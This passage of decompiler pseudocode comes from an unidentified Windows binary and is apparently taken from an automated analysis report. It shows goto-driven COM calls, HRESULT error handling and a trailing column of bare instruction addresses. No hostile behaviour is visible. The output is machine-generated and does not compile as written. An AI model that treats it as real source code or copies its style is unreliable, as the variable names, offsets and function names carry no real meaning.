											if(_t885 == 0x80070057) {
												_t885 = 0x80004001;
											}
											__eflags = _t885;
											if(_t885 != 0) {
												_t519 =  *(_t903 - 0x10);
												 *(_t903 - 4) = 2;
												goto L138;
											} else {
												_t787 =  *(_t903 - 0x10);
												goto L72;
											}
										} else {
											__eflags =  *(_t903 + 0x40);
											if( *(_t903 + 0x40) == 0) {
												L56:
												 *(_t903 - 0x10) =  *(_t903 - 0x10) & 0x00000000;
												 *(_t903 - 4) = 0xb;
												 *((intOrPtr*)( *_t879))(_t879, 0x42d270, _t903 - 0x10);
												_t675 =  *(_t903 - 0x10);
												__eflags = _t675;
												if(_t675 == 0) {
													L59:
													__eflags = _t675;
													 *(_t903 - 4) = 2;
													if(_t675 != 0) {
														 *((intOrPtr*)( *_t675 + 8))(_t675);
													}
													goto L61;
												}
												 *(_t903 - 0x15) = 1;
												_t885 =  *((intOrPtr*)( *_t675 + 0xc))(_t675,  *((intOrPtr*)(_t903 + 0x48)),  *((intOrPtr*)(_t903 + 0x4c)));
												__eflags = _t885;
												if(_t885 != 0) {
													_t519 =  *(_t903 - 0x10);
													 *(_t903 - 4) = 2;
													L138:
													__eflags = _t519;
													if(_t519 != 0) {
														_t519 =  *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													goto L199;
												}
												_t675 =  *(_t903 - 0x10);
												goto L59;
											}
											 *(_t903 - 0x10) =  *(_t903 - 0x10) & 0x00000000;
											 *(_t903 - 4) = 0xa;
											 *((intOrPtr*)( *_t879))(_t879, 0x42d240, _t903 - 0x10);
											_t680 =  *(_t903 - 0x10);
											__eflags = _t680;
											if(_t680 == 0) {
												L54:
												__eflags = _t680;
												 *(_t903 - 4) = 2;
												if(_t680 != 0) {
													 *((intOrPtr*)( *_t680 + 8))(_t680);
												}
												goto L56;
											}
											 *(_t903 - 0x15) = 1;
											_t885 =  *((intOrPtr*)( *_t680 + 0xc))(_t680,  *(_t903 + 0x44));
											__eflags = _t885;
											if(_t885 != 0) {
												_t519 =  *(_t903 - 0x10);
												 *(_t903 - 4) = 2;
												goto L138;
											}
											_t680 =  *(_t903 - 0x10);
											goto L54;
										}
										L120:
										_t853 =  *(( *(_t903 - 0x14))[0x58]);
										_t633 = E003B1E40( *((intOrPtr*)(_t853 + 0x18))( *((intOrPtr*)(_t903 - 0x28)), _t629,  *(_t903 - 0x10),  *(_t903 - 0x6c)),  *(_t903 - 0x10));
										 *(_t903 - 4) = 2;
										E003B1E40(_t633,  *(_t903 - 0x1c));
										 *((intOrPtr*)(_t903 - 0x28)) =  *((intOrPtr*)(_t903 - 0x28)) + 1;
										 *(_t903 - 0x60) =  *(_t903 - 0x60) + 8;
										 *((intOrPtr*)(_t903 - 0x68)) =  *((intOrPtr*)(_t903 - 0x68)) + 0x18;
										__eflags =  *((intOrPtr*)(_t903 - 0x28)) -  *(_t903 - 0x58);
									} while ( *((intOrPtr*)(_t903 - 0x28)) <  *(_t903 - 0x58));
									_t889 = 0;
									__eflags = 0;
									goto L122;
								} else {
									_t711 = 0;
									__eflags = 0;
									goto L33;
									L34:
									__eflags = _t829;
									if(__eflags == 0) {
										goto L133;
									}
									L35:
									 *(_t903 - 0x3c) =  *(_t903 - 0x3c) & 0x00000000;
									 *(_t903 - 0x38) =  *(_t903 - 0x38) & 0x00000000;
									_push( *(_t899 + 4));
									 *(_t903 - 4) = 5;
									_push( *_t899);
									_t685 = E003BA7E3(0, _t903 - 0x3c, __eflags);
									__eflags = _t685;
									if(_t685 != 0) {
										 *(_t903 - 4) = 6;
										_t885 = _t685;
										L69:
										E003DCFEF(_t903 - 0x38);
										 *(_t903 - 4) = 2;
										_t519 = E003DCFEF(_t903 - 0x3c);
										goto L199;
									}
									_t900 =  *((intOrPtr*)(_t899 + 0x10));
									__eflags = _t900 - 1;
									if(_t900 != 1) {
										__eflags =  *(_t903 - 0x38);
										if( *(_t903 - 0x38) == 0) {
											L70:
											 *(_t903 - 4) = 8;
											E003DCFEF(_t903 - 0x38);
											 *(_t903 - 4) = 2;
											_t688 = E003DCFEF(_t903 - 0x3c);
											 *(_t903 - 4) =  *(_t903 - 4) & 0x00000000;
											E003B1E40(_t688,  *((intOrPtr*)(_t903 - 0x88)));
											E003ED46A(_t903 - 0xc8);
											 *(_t903 - 4) =  *(_t903 - 4) | 0xffffffff;
											E003F4F71(_t903 - 0x5c);
											_t523 = 0x80004001;
											goto L201;
										}
										__eflags =  *((intOrPtr*)(_t903 - 0x30)) - _t900;
										if( *((intOrPtr*)(_t903 - 0x30)) != _t900) {
											goto L70;
										}
										L41:
										_t853 = _t903 - 0x3c;
										 *((intOrPtr*)( *(( *(_t903 - 0x14))[0x58]) + 8))(_t853);
										 *(_t903 - 4) = 9;
										E003DCFEF(_t903 - 0x38);
										 *(_t903 - 4) = 2;
										E003DCFEF(_t903 - 0x3c);
										 *(_t903 - 0x1c) =  *(_t903 - 0x1c) + 1;
										_t711 = _t711 + 0x18;
										__eflags =  *(_t903 - 0x1c) -  *(_t903 - 0x58);
										if(__eflags < 0) {
											L33:
											_t683 =  *((intOrPtr*)(_t903 - 0x5c));
											_t899 = _t711 + _t683;
											_t829 =  *(_t899 + 4);
											_t519 =  *(_t711 + _t683) & 0x00000000;
											__eflags = ( *(_t711 + _t683) & 0x00000000) - 0x40300;
											if(__eflags != 0) {
												goto L35;
											}
											goto L34;
										} else {
											_t705 =  *(_t903 - 0x2c);
											goto L43;
										}
									}
									__eflags =  *(_t903 - 0x3c) - _t685;
									if( *(_t903 - 0x3c) == _t685) {
										 *(_t903 - 4) = 7;
										_t885 = 0x80004001;
										goto L69;
									} else {
										goto L41;
									}
								}
							} else {
								L30:
								_t885 = _t519;
								goto L199;
							}
						}
						_t853 =  &(_t525[4]);
						_t703 = E003F4D6A(_t903 - 0xc8, _t853);
						__eflags = _t703;
						if(_t703 != 0) {
							goto L44;
						}
						goto L15;
					}
					_t901 =  *(_t903 + 0x1c);
					_t870 =  *_t901;
					_t902 =  *((intOrPtr*)(_t901 + 4));
					__eflags = _t902 - _t519;
					if(__eflags < 0) {
						__eflags = _t870 - _t727;
						L9:
						if(__eflags != 0) {
							L12:
							_t44 = _t903 + 0x1b;
							 *_t44 =  *(_t903 + 0x1b) & 0x00000000;
							__eflags =  *_t44;
							goto L13;
						}
						__eflags = _t902 - _t519;
						if(_t902 != _t519) {
							goto L12;
						} else {
							 *(_t903 + 0x1b) = 1;
							goto L13;
						}
					}
					if(__eflags > 0) {
						L7:
						_t885 = 0x80004005;
						goto L199;
					}
					__eflags = _t870 - _t727;
					if(__eflags <= 0) {
						goto L9;
					}
					goto L7;
				} else {
					_t885 = 0x80004001;
					L200:
					 *(_t903 - 4) =  *(_t903 - 4) | 0xffffffff;
					E003F4F71(_t903 - 0x5c);
					_t523 = _t885;
					L201:
					 *[fs:0x0] =  *((intOrPtr*)(_t903 - 0xc));
					return _t523;
				}
			}








































































































                                                                                                    0x003f3f07
                                                                                                    0x003f3f16
                                                                                                    0x003f3f1d
                                                                                                    0x003f3f20
                                                                                                    0x003f3f2c
                                                                                                    0x003f3f32
                                                                                                    0x003f3f38
                                                                                                    0x003f3f3b
                                                                                                    0x003f3f43
                                                                                                    0x003f3f4c
                                                                                                    0x003f3f5f
                                                                                                    0x003f3f62
                                                                                                    0x003f3f74
                                                                                                    0x003f3f7f
                                                                                                    0x003f3f83
                                                                                                    0x003f3f91
                                                                                                    0x003f3f95
                                                                                                    0x003f3fa0
                                                                                                    0x003f3fa5
                                                                                                    0x003f3fa7
                                                                                                    0x003f46b6
                                                                                                    0x003f46b6
                                                                                                    0x003f4a81
                                                                                                    0x003f4a87
                                                                                                    0x003f4a87
                                                                                                    0x003f4a87
                                                                                                    0x003f4a8b
                                                                                                    0x003f4a97
                                                                                                    0x00000000
                                                                                                    0x003f4a97
                                                                                                    0x003f3fad
                                                                                                    0x003f3fb0
                                                                                                    0x003f3fb4
                                                                                                    0x003f3fc1
                                                                                                    0x003f3fc4
                                                                                                    0x003f3fc8
                                                                                                    0x003f3fcb
                                                                                                    0x003f3fcf
                                                                                                    0x003f3fff
                                                                                                    0x003f3fff
                                                                                                    0x003f4002
                                                                                                    0x003f4005
                                                                                                    0x003f401d
                                                                                                    0x003f401d
                                                                                                    0x003f4020
                                                                                                    0x003f4023
                                                                                                    0x003f4026
                                                                                                    0x003f4029
                                                                                                    0x003f402b
                                                                                                    0x003f4030
                                                                                                    0x003f4033
                                                                                                    0x003f4033
                                                                                                    0x003f4036
                                                                                                    0x003f4036
                                                                                                    0x003f4039
                                                                                                    0x003f403d
                                                                                                    0x003f4042
                                                                                                    0x003f407c
                                                                                                    0x003f4082
                                                                                                    0x003f4085
                                                                                                    0x003f4087
                                                                                                    0x003f408b
                                                                                                    0x003f4098
                                                                                                    0x003f4098
                                                                                                    0x003f408d
                                                                                                    0x003f4091
                                                                                                    0x003f4091
                                                                                                    0x003f409e
                                                                                                    0x003f40a2
                                                                                                    0x003f40a7
                                                                                                    0x003f40af
                                                                                                    0x003f4044
                                                                                                    0x003f4044
                                                                                                    0x003f404a
                                                                                                    0x003f404d
                                                                                                    0x003f404f
                                                                                                    0x003f4053
                                                                                                    0x003f4060
                                                                                                    0x003f4060
                                                                                                    0x003f4055
                                                                                                    0x003f4059
                                                                                                    0x003f4059
                                                                                                    0x003f4066
                                                                                                    0x003f406a
                                                                                                    0x003f406f
                                                                                                    0x003f4077
                                                                                                    0x003f4077
                                                                                                    0x003f40b2
                                                                                                    0x003f40b4
                                                                                                    0x003f40bb
                                                                                                    0x003f40bb
                                                                                                    0x003f40b6
                                                                                                    0x003f40b6
                                                                                                    0x003f40b6
                                                                                                    0x003f40bd
                                                                                                    0x003f40c0
                                                                                                    0x003f40c7
                                                                                                    0x003f40d1
                                                                                                    0x003f40d4
                                                                                                    0x003f40d6
                                                                                                    0x003f40df
                                                                                                    0x003f40e3
                                                                                                    0x003f40e7
                                                                                                    0x003f4191
                                                                                                    0x003f4194
                                                                                                    0x003f41a0
                                                                                                    0x003f41ab
                                                                                                    0x003f41af
                                                                                                    0x003f41b7
                                                                                                    0x003f41ba
                                                                                                    0x003f41c2
                                                                                                    0x003f41c5
                                                                                                    0x003f41c7
                                                                                                    0x003f41c9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f41d2
                                                                                                    0x003f41d6
                                                                                                    0x003f41d9
                                                                                                    0x003f41df
                                                                                                    0x003f41e2
                                                                                                    0x003f41e5
                                                                                                    0x003f41e8
                                                                                                    0x003f463c
                                                                                                    0x003f463c
                                                                                                    0x003f463f
                                                                                                    0x003f4644
                                                                                                    0x003f464b
                                                                                                    0x003f464b
                                                                                                    0x003f4651
                                                                                                    0x003f4651
                                                                                                    0x003f4654
                                                                                                    0x003f4657
                                                                                                    0x003f465a
                                                                                                    0x003f465d
                                                                                                    0x003f465f
                                                                                                    0x003f4663
                                                                                                    0x003f4669
                                                                                                    0x003f466c
                                                                                                    0x003f466e
                                                                                                    0x003f4672
                                                                                                    0x003f4727
                                                                                                    0x003f4727
                                                                                                    0x003f4678
                                                                                                    0x003f467a
                                                                                                    0x003f467a
                                                                                                    0x003f4729
                                                                                                    0x003f472b
                                                                                                    0x003f472e
                                                                                                    0x003f4732
                                                                                                    0x003f4735
                                                                                                    0x003f473a
                                                                                                    0x003f473a
                                                                                                    0x003f4740
                                                                                                    0x003f4744
                                                                                                    0x003f4747
                                                                                                    0x003f474b
                                                                                                    0x003f474e
                                                                                                    0x003f4751
                                                                                                    0x003f47a2
                                                                                                    0x003f47a2
                                                                                                    0x003f47a6
                                                                                                    0x003f47aa
                                                                                                    0x003f4901
                                                                                                    0x003f4901
                                                                                                    0x003f4904
                                                                                                    0x003f4906
                                                                                                    0x003f4908
                                                                                                    0x003f490a
                                                                                                    0x003f490d
                                                                                                    0x003f4914
                                                                                                    0x003f4916
                                                                                                    0x003f4918
                                                                                                    0x003f4918
                                                                                                    0x003f491a
                                                                                                    0x003f491a
                                                                                                    0x003f491d
                                                                                                    0x003f4923
                                                                                                    0x003f4926
                                                                                                    0x003f4926
                                                                                                    0x003f4929
                                                                                                    0x003f492b
                                                                                                    0x003f492f
                                                                                                    0x003f4931
                                                                                                    0x003f4943
                                                                                                    0x003f4943
                                                                                                    0x003f4946
                                                                                                    0x003f4948
                                                                                                    0x003f4a4a
                                                                                                    0x003f4a53
                                                                                                    0x003f4a5a
                                                                                                    0x003f4a5c
                                                                                                    0x00000000
                                                                                                    0x003f4a61
                                                                                                    0x003f494e
                                                                                                    0x003f4952
                                                                                                    0x003f4956
                                                                                                    0x003f495a
                                                                                                    0x003f4962
                                                                                                    0x003f4965
                                                                                                    0x003f496a
                                                                                                    0x003f496c
                                                                                                    0x003f496e
                                                                                                    0x003f4970
                                                                                                    0x003f4976
                                                                                                    0x003f4979
                                                                                                    0x003f497b
                                                                                                    0x003f497f
                                                                                                    0x003f49b8
                                                                                                    0x003f49b8
                                                                                                    0x003f4981
                                                                                                    0x003f4986
                                                                                                    0x003f4986
                                                                                                    0x003f49be
                                                                                                    0x003f49c2
                                                                                                    0x003f49c2
                                                                                                    0x003f496c
                                                                                                    0x003f49c7
                                                                                                    0x003f49ca
                                                                                                    0x003f49cd
                                                                                                    0x003f49cf
                                                                                                    0x003f49d1
                                                                                                    0x003f49d1
                                                                                                    0x003f49e8
                                                                                                    0x003f49ea
                                                                                                    0x003f49ed
                                                                                                    0x003f49ef
                                                                                                    0x003f49f3
                                                                                                    0x003f49f8
                                                                                                    0x003f49f8
                                                                                                    0x003f49fc
                                                                                                    0x003f4a01
                                                                                                    0x003f4a05
                                                                                                    0x003f4a07
                                                                                                    0x003f4a0b
                                                                                                    0x003f4a10
                                                                                                    0x003f4a10
                                                                                                    0x003f4a16
                                                                                                    0x003f4a1a
                                                                                                    0x003f4a25
                                                                                                    0x003f4a29
                                                                                                    0x003f4a35
                                                                                                    0x003f4a3a
                                                                                                    0x003f4a41
                                                                                                    0x003f4a46
                                                                                                    0x00000000
                                                                                                    0x003f4933
                                                                                                    0x003f4933
                                                                                                    0x003f493b
                                                                                                    0x003f493e
                                                                                                    0x003f493f
                                                                                                    0x003f493f
                                                                                                    0x00000000
                                                                                                    0x003f4933
                                                                                                    0x003f4931
                                                                                                    0x003f47b0
                                                                                                    0x003f47b3
                                                                                                    0x003f47b3
                                                                                                    0x003f47b9
                                                                                                    0x003f47bc
                                                                                                    0x003f47bf
                                                                                                    0x003f47c3
                                                                                                    0x003f47c6
                                                                                                    0x003f47ca
                                                                                                    0x003f47f5
                                                                                                    0x003f47f9
                                                                                                    0x003f47fb
                                                                                                    0x003f483f
                                                                                                    0x003f4844
                                                                                                    0x003f4847
                                                                                                    0x003f485c
                                                                                                    0x003f485c
                                                                                                    0x003f485c
                                                                                                    0x003f4849
                                                                                                    0x003f4849
                                                                                                    0x003f484d
                                                                                                    0x003f4851
                                                                                                    0x003f4857
                                                                                                    0x003f4857
                                                                                                    0x003f4866
                                                                                                    0x003f4871
                                                                                                    0x003f4874
                                                                                                    0x003f4879
                                                                                                    0x003f487c
                                                                                                    0x003f47fd
                                                                                                    0x003f47fd
                                                                                                    0x003f4802
                                                                                                    0x003f4805
                                                                                                    0x003f481a
                                                                                                    0x003f481a
                                                                                                    0x003f481a
                                                                                                    0x003f4807
                                                                                                    0x003f4807
                                                                                                    0x003f480b
                                                                                                    0x003f480f
                                                                                                    0x003f4815
                                                                                                    0x003f4815
                                                                                                    0x003f4824
                                                                                                    0x003f482f
                                                                                                    0x003f4832
                                                                                                    0x003f4837
                                                                                                    0x003f483a
                                                                                                    0x003f483a
                                                                                                    0x003f487f
                                                                                                    0x003f4882
                                                                                                    0x003f4885
                                                                                                    0x00000000
                                                                                                    0x003f4885
                                                                                                    0x003f47cc
                                                                                                    0x003f47db
                                                                                                    0x003f47dd
                                                                                                    0x003f47df
                                                                                                    0x003f498d
                                                                                                    0x003f4990
                                                                                                    0x003f4994
                                                                                                    0x003f4996
                                                                                                    0x003f499b
                                                                                                    0x003f499b
                                                                                                    0x003f499e
                                                                                                    0x003f49a1
                                                                                                    0x003f49a5
                                                                                                    0x003f49a7
                                                                                                    0x003f49b0
                                                                                                    0x003f49b0
                                                                                                    0x00000000
                                                                                                    0x003f49a7
                                                                                                    0x003f47eb
                                                                                                    0x003f4888
                                                                                                    0x003f4888
                                                                                                    0x003f488a
                                                                                                    0x003f4892
                                                                                                    0x003f4894
                                                                                                    0x003f48a6
                                                                                                    0x003f48a6
                                                                                                    0x003f4896
                                                                                                    0x003f4896
                                                                                                    0x003f4899
                                                                                                    0x003f489c
                                                                                                    0x003f48a2
                                                                                                    0x003f48a2
                                                                                                    0x003f48b3
                                                                                                    0x003f48bb
                                                                                                    0x003f48be
                                                                                                    0x003f48cb
                                                                                                    0x003f48cf
                                                                                                    0x003f48d2
                                                                                                    0x003f48d6
                                                                                                    0x003f48d9
                                                                                                    0x003f48dc
                                                                                                    0x003f48df
                                                                                                    0x003f48e2
                                                                                                    0x003f48e5
                                                                                                    0x003f48e7
                                                                                                    0x003f48ec
                                                                                                    0x003f48ec
                                                                                                    0x003f48ef
                                                                                                    0x003f48f2
                                                                                                    0x003f48f8
                                                                                                    0x003f48f8
                                                                                                    0x00000000
                                                                                                    0x003f4753
                                                                                                    0x003f475c
                                                                                                    0x003f4769
                                                                                                    0x003f4772
                                                                                                    0x003f4774
                                                                                                    0x003f4776
                                                                                                    0x003f4a62
                                                                                                    0x003f4a62
                                                                                                    0x003f4a65
                                                                                                    0x003f4a69
                                                                                                    0x003f4a6b
                                                                                                    0x003f4a70
                                                                                                    0x003f4a70
                                                                                                    0x003f4a73
                                                                                                    0x003f4a75
                                                                                                    0x003f4a78
                                                                                                    0x003f4a7c
                                                                                                    0x00000000
                                                                                                    0x003f4a7c
                                                                                                    0x003f4783
                                                                                                    0x003f4788
                                                                                                    0x003f478a
                                                                                                    0x003f4795
                                                                                                    0x003f479a
                                                                                                    0x003f479c
                                                                                                    0x003f479e
                                                                                                    0x003f479e
                                                                                                    0x003f479c
                                                                                                    0x00000000
                                                                                                    0x003f478a
                                                                                                    0x003f4751
                                                                                                    0x003f41ee
                                                                                                    0x003f41ee
                                                                                                    0x003f41f1
                                                                                                    0x003f41f4
                                                                                                    0x003f41f7
                                                                                                    0x003f4205
                                                                                                    0x003f420d
                                                                                                    0x003f4210
                                                                                                    0x003f4212
                                                                                                    0x003f4214
                                                                                                    0x003f4216
                                                                                                    0x003f4218
                                                                                                    0x003f4218
                                                                                                    0x003f421b
                                                                                                    0x003f421f
                                                                                                    0x003f4222
                                                                                                    0x003f42bb
                                                                                                    0x003f42bb
                                                                                                    0x003f42cb
                                                                                                    0x003f42cf
                                                                                                    0x003f42d4
                                                                                                    0x003f42d7
                                                                                                    0x003f42d9
                                                                                                    0x003f4696
                                                                                                    0x003f4699
                                                                                                    0x003f46ac
                                                                                                    0x003f46ac
                                                                                                    0x003f46ae
                                                                                                    0x003f46b3
                                                                                                    0x003f46b3
                                                                                                    0x00000000
                                                                                                    0x003f46ae
                                                                                                    0x003f42df
                                                                                                    0x003f42e2
                                                                                                    0x003f42e4
                                                                                                    0x003f4387
                                                                                                    0x003f4389
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f438f
                                                                                                    0x003f438f
                                                                                                    0x003f4391
                                                                                                    0x003f4395
                                                                                                    0x003f439a
                                                                                                    0x003f439a
                                                                                                    0x003f439d
                                                                                                    0x003f43ad
                                                                                                    0x003f43b1
                                                                                                    0x003f43b3
                                                                                                    0x003f43b6
                                                                                                    0x003f43b8
                                                                                                    0x003f4489
                                                                                                    0x003f4489
                                                                                                    0x003f448b
                                                                                                    0x003f448f
                                                                                                    0x003f4494
                                                                                                    0x003f4494
                                                                                                    0x003f4497
                                                                                                    0x003f449b
                                                                                                    0x003f44ab
                                                                                                    0x003f44af
                                                                                                    0x003f44b1
                                                                                                    0x003f44b4
                                                                                                    0x003f44b6
                                                                                                    0x003f44d9
                                                                                                    0x003f44d9
                                                                                                    0x003f44db
                                                                                                    0x003f44df
                                                                                                    0x003f44e4
                                                                                                    0x003f44e4
                                                                                                    0x003f44ec
                                                                                                    0x003f44ef
                                                                                                    0x003f44f2
                                                                                                    0x003f44f4
                                                                                                    0x003f44f7
                                                                                                    0x003f44f9
                                                                                                    0x003f44fe
                                                                                                    0x003f4500
                                                                                                    0x003f4502
                                                                                                    0x003f4502
                                                                                                    0x003f4504
                                                                                                    0x003f4504
                                                                                                    0x003f4507
                                                                                                    0x003f450e
                                                                                                    0x003f450e
                                                                                                    0x003f4511
                                                                                                    0x003f4513
                                                                                                    0x003f4517
                                                                                                    0x003f451a
                                                                                                    0x003f451c
                                                                                                    0x003f4521
                                                                                                    0x003f4523
                                                                                                    0x003f4525
                                                                                                    0x003f4525
                                                                                                    0x003f4527
                                                                                                    0x003f4527
                                                                                                    0x003f452a
                                                                                                    0x003f4531
                                                                                                    0x003f4531
                                                                                                    0x003f4534
                                                                                                    0x003f4536
                                                                                                    0x003f453a
                                                                                                    0x003f453d
                                                                                                    0x003f45db
                                                                                                    0x003f45db
                                                                                                    0x003f45de
                                                                                                    0x003f45e0
                                                                                                    0x003f45ed
                                                                                                    0x003f45f6
                                                                                                    0x003f45f6
                                                                                                    0x00000000
                                                                                                    0x003f45f6
                                                                                                    0x003f45e5
                                                                                                    0x003f45eb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f4543
                                                                                                    0x003f4543
                                                                                                    0x003f4546
                                                                                                    0x003f4549
                                                                                                    0x003f4549
                                                                                                    0x003f454c
                                                                                                    0x003f454e
                                                                                                    0x003f4551
                                                                                                    0x003f4568
                                                                                                    0x003f4568
                                                                                                    0x003f4568
                                                                                                    0x003f456b
                                                                                                    0x003f456b
                                                                                                    0x003f456d
                                                                                                    0x003f4588
                                                                                                    0x003f458a
                                                                                                    0x003f458d
                                                                                                    0x003f45a2
                                                                                                    0x003f45a2
                                                                                                    0x003f45a2
                                                                                                    0x003f45a5
                                                                                                    0x003f45a5
                                                                                                    0x003f45a7
                                                                                                    0x003f471e
                                                                                                    0x00000000
                                                                                                    0x003f4724
                                                                                                    0x003f45b5
                                                                                                    0x003f45b5
                                                                                                    0x003f45b8
                                                                                                    0x003f45bc
                                                                                                    0x003f45be
                                                                                                    0x003f45c1
                                                                                                    0x00000000
                                                                                                    0x003f45c1
                                                                                                    0x003f458f
                                                                                                    0x003f4592
                                                                                                    0x003f4595
                                                                                                    0x003f4597
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f4599
                                                                                                    0x003f459a
                                                                                                    0x003f459d
                                                                                                    0x003f45a0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f45a0
                                                                                                    0x00000000
                                                                                                    0x003f4592
                                                                                                    0x003f457f
                                                                                                    0x00000000
                                                                                                    0x003f457f
                                                                                                    0x003f4553
                                                                                                    0x003f4555
                                                                                                    0x003f4557
                                                                                                    0x003f455a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f455c
                                                                                                    0x003f455d
                                                                                                    0x003f4560
                                                                                                    0x003f4563
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f4565
                                                                                                    0x00000000
                                                                                                    0x003f4565
                                                                                                    0x003f4583
                                                                                                    0x00000000
                                                                                                    0x003f45c3
                                                                                                    0x003f45c3
                                                                                                    0x003f45c6
                                                                                                    0x003f45cc
                                                                                                    0x003f45cf
                                                                                                    0x003f45d2
                                                                                                    0x003f45d2
                                                                                                    0x00000000
                                                                                                    0x003f4549
                                                                                                    0x003f44b8
                                                                                                    0x003f44b8
                                                                                                    0x003f44bf
                                                                                                    0x003f44c2
                                                                                                    0x003f44cc
                                                                                                    0x003f44ce
                                                                                                    0x003f44d0
                                                                                                    0x003f46f9
                                                                                                    0x003f46fc
                                                                                                    0x00000000
                                                                                                    0x003f46fc
                                                                                                    0x003f44d6
                                                                                                    0x00000000
                                                                                                    0x003f44d6
                                                                                                    0x003f43be
                                                                                                    0x003f43c1
                                                                                                    0x003f43c4
                                                                                                    0x003f43c7
                                                                                                    0x003f43c9
                                                                                                    0x003f46a8
                                                                                                    0x00000000
                                                                                                    0x003f46a8
                                                                                                    0x003f43cf
                                                                                                    0x003f43da
                                                                                                    0x003f43e1
                                                                                                    0x003f43e3
                                                                                                    0x003f43e5
                                                                                                    0x003f46c0
                                                                                                    0x003f46df
                                                                                                    0x003f46e2
                                                                                                    0x003f46ea
                                                                                                    0x003f46f0
                                                                                                    0x003f46f3
                                                                                                    0x00000000
                                                                                                    0x003f46f3
                                                                                                    0x003f43ee
                                                                                                    0x003f43f3
                                                                                                    0x003f43f6
                                                                                                    0x003f43fb
                                                                                                    0x003f43fe
                                                                                                    0x003f4405
                                                                                                    0x003f440a
                                                                                                    0x003f440a
                                                                                                    0x003f4414
                                                                                                    0x003f4419
                                                                                                    0x003f441b
                                                                                                    0x003f441f
                                                                                                    0x003f4421
                                                                                                    0x003f4440
                                                                                                    0x003f4443
                                                                                                    0x003f444f
                                                                                                    0x003f4451
                                                                                                    0x003f4453
                                                                                                    0x003f46c9
                                                                                                    0x003f46d5
                                                                                                    0x003f46db
                                                                                                    0x00000000
                                                                                                    0x003f46db
                                                                                                    0x003f445c
                                                                                                    0x003f4468
                                                                                                    0x003f4471
                                                                                                    0x003f4475
                                                                                                    0x003f447d
                                                                                                    0x003f4483
                                                                                                    0x003f4486
                                                                                                    0x00000000
                                                                                                    0x003f4423
                                                                                                    0x003f4423
                                                                                                    0x003f4429
                                                                                                    0x003f442d
                                                                                                    0x003f4437
                                                                                                    0x003f443b
                                                                                                    0x003f443c
                                                                                                    0x003f443c
                                                                                                    0x00000000
                                                                                                    0x003f4423
                                                                                                    0x003f4421
                                                                                                    0x003f43b8
                                                                                                    0x003f42f8
                                                                                                    0x003f42fa
                                                                                                    0x003f4300
                                                                                                    0x003f4302
                                                                                                    0x003f4302
                                                                                                    0x003f4307
                                                                                                    0x003f4309
                                                                                                    0x003f469f
                                                                                                    0x003f46a2
                                                                                                    0x00000000
                                                                                                    0x003f430f
                                                                                                    0x003f430f
                                                                                                    0x00000000
                                                                                                    0x003f430f
                                                                                                    0x003f4228
                                                                                                    0x003f4228
                                                                                                    0x003f422c
                                                                                                    0x003f4273
                                                                                                    0x003f4273
                                                                                                    0x003f4283
                                                                                                    0x003f4287
                                                                                                    0x003f4289
                                                                                                    0x003f428c
                                                                                                    0x003f428e
                                                                                                    0x003f42ad
                                                                                                    0x003f42ad
                                                                                                    0x003f42af
                                                                                                    0x003f42b3
                                                                                                    0x003f42b8
                                                                                                    0x003f42b8
                                                                                                    0x00000000
                                                                                                    0x003f42b3
                                                                                                    0x003f4295
                                                                                                    0x003f42a0
                                                                                                    0x003f42a2
                                                                                                    0x003f42a4
                                                                                                    0x003f468d
                                                                                                    0x003f4690
                                                                                                    0x003f4700
                                                                                                    0x003f4700
                                                                                                    0x003f4702
                                                                                                    0x003f470b
                                                                                                    0x003f470b
                                                                                                    0x00000000
                                                                                                    0x003f4702
                                                                                                    0x003f42aa
                                                                                                    0x00000000
                                                                                                    0x003f42aa
                                                                                                    0x003f422e
                                                                                                    0x003f423e
                                                                                                    0x003f4242
                                                                                                    0x003f4244
                                                                                                    0x003f4247
                                                                                                    0x003f4249
                                                                                                    0x003f4265
                                                                                                    0x003f4265
                                                                                                    0x003f4267
                                                                                                    0x003f426b
                                                                                                    0x003f4270
                                                                                                    0x003f4270
                                                                                                    0x00000000
                                                                                                    0x003f426b
                                                                                                    0x003f4250
                                                                                                    0x003f4258
                                                                                                    0x003f425a
                                                                                                    0x003f425c
                                                                                                    0x003f4684
                                                                                                    0x003f4687
                                                                                                    0x00000000
                                                                                                    0x003f4687
                                                                                                    0x003f4262
                                                                                                    0x00000000
                                                                                                    0x003f4262
                                                                                                    0x003f45f8
                                                                                                    0x003f4604
                                                                                                    0x003f4610
                                                                                                    0x003f4618
                                                                                                    0x003f461c
                                                                                                    0x003f4621
                                                                                                    0x003f4624
                                                                                                    0x003f462b
                                                                                                    0x003f462f
                                                                                                    0x003f4633
                                                                                                    0x003f463a
                                                                                                    0x003f463a
                                                                                                    0x00000000
                                                                                                    0x003f40ed
                                                                                                    0x003f40ed
                                                                                                    0x003f40ed
                                                                                                    0x003f40ed
                                                                                                    0x003f4104
                                                                                                    0x003f4104
                                                                                                    0x003f4106
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f410c
                                                                                                    0x003f410c
                                                                                                    0x003f4110
                                                                                                    0x003f4114
                                                                                                    0x003f411c
                                                                                                    0x003f4120
                                                                                                    0x003f4122
                                                                                                    0x003f4127
                                                                                                    0x003f4129
                                                                                                    0x003f4314
                                                                                                    0x003f4318
                                                                                                    0x003f4325
                                                                                                    0x003f4328
                                                                                                    0x003f4330
                                                                                                    0x003f4334
                                                                                                    0x00000000
                                                                                                    0x003f4334
                                                                                                    0x003f412f
                                                                                                    0x003f4132
                                                                                                    0x003f4135
                                                                                                    0x003f4142
                                                                                                    0x003f4146
                                                                                                    0x003f433e
                                                                                                    0x003f4341
                                                                                                    0x003f4345
                                                                                                    0x003f434d
                                                                                                    0x003f4351
                                                                                                    0x003f435c
                                                                                                    0x003f4360
                                                                                                    0x003f436c
                                                                                                    0x003f4371
                                                                                                    0x003f4378
                                                                                                    0x003f437d
                                                                                                    0x00000000
                                                                                                    0x003f437d
                                                                                                    0x003f414c
                                                                                                    0x003f414f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f4155
                                                                                                    0x003f4158
                                                                                                    0x003f4161
                                                                                                    0x003f4167
                                                                                                    0x003f416b
